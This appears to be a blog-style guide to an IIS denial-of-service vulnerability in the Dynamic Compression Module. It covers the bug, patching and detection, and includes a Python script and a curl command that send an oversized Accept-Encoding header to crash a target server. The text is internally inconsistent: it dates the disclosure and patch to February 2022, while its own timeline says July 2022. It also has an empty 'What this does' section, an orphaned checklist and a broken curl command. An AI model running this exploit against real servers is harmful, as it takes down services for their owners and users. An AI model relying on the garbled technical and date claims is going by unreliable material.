CVE-2022-22040 - Crashing IIS Servers with Dynamic Compression — An Easy-to-Understand Guide

Microsoft Internet Information Services (IIS) is widely used for hosting web applications on Windows servers. In February 2022, a security vulnerability named CVE-2022-22040 was published. This bug allows remote attackers to crash the IIS web server by abusing the Dynamic Compression Module, potentially disrupting critical web services.

Let’s break down what CVE-2022-22040 is, how it works, see a simple code example, and understand how to protect your systems.

What is CVE-2022-22040?

CVE-2022-22040 is a Denial of Service (DoS) vulnerability in Microsoft IIS’s Dynamic Compression Module. By sending specially-crafted HTTP requests, an attacker can make the server go unresponsive or crash.

References

- Microsoft Security Update Guide: CVE-2022-22040
- Microsoft Patch Tuesday, Feb 2022 (includes CVE-2022-22040)

How Does This Exploit Work?

Dynamic Compression in IIS compresses HTTP responses to save bandwidth. However, due to a parsing bug, if a client sends a request with certain compressed encoding settings or headers, IIS tries to process it in a way that makes the worker process (w3wp.exe) crash.

Technical Details

The vulnerability lies in the way IIS handles certain headers (Accept-Encoding) that interact with the Dynamic Compression Module. An attacker can craft a request with invalid or very large headers, making w3wp.exe consume excessive memory or hit an exception.

What does an exploit look like?

Here’s a very simplified Python code example that can trigger the bug on a vulnerable IIS server:

import socket

target_host = "TARGET_IIS_IP_HERE"
target_port = 80  # Change to 443 if IIS is using HTTPS (with SSL support)

# Craft a malicious HTTP request
malicious_request = (
    "GET / HTTP/1.1\r\n"
    "Host: {}\r\n"
    "Accept-Encoding: " + "A" * 900 + "\r\n"
    "Connection: close\r\n\r\n"
).format(target_host)

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
    sock.connect((target_host, target_port))
    sock.sendall(malicious_request.encode())
    # Optionally read the response
    try:
        response = sock.recv(4096)
        print(response.decode(errors="ignore"))
    except:
        pass

print("Malicious request sent to IIS server!")

What this does:

You can do similar things with curl

curl -H "Accept-Encoding: python -c 'print(\"A\"*900)'" http://TARGET/

[x] Windows Server 2016

- [x] Windows Server 2012 R2/2012

1. Patch Your Server!

Microsoft released patches in February 2022.

- Go to Microsoft Update Catalog

Detection

- Check IIS logs or Windows Application logs (Event Viewer) for repeated crashes or application pool termination.

Conclusion

CVE-2022-22040 shows that even basic HTTP features like compression can be turned against your servers. It’s critical to patch IIS, monitor for abnormal behavior, and disable unused features. This DoS bug doesn’t let attackers steal anything, but downtime can be just as damaging for your business.

Further Reading

1. Microsoft Security Guide for CVE-2022-22040
2. IIS Documentation: Compression
3. Feb 2022 Patch Tuesday breakdown (BleepingComputer)


If your organization uses IIS, take a few minutes and make sure you’re patched and protected. Don’t let a tiny HTTP header take down your network!

Timeline

Published on: 07/12/2022 23:15:00 UTC
Last modified on: 07/16/2022 19:12:00 UTC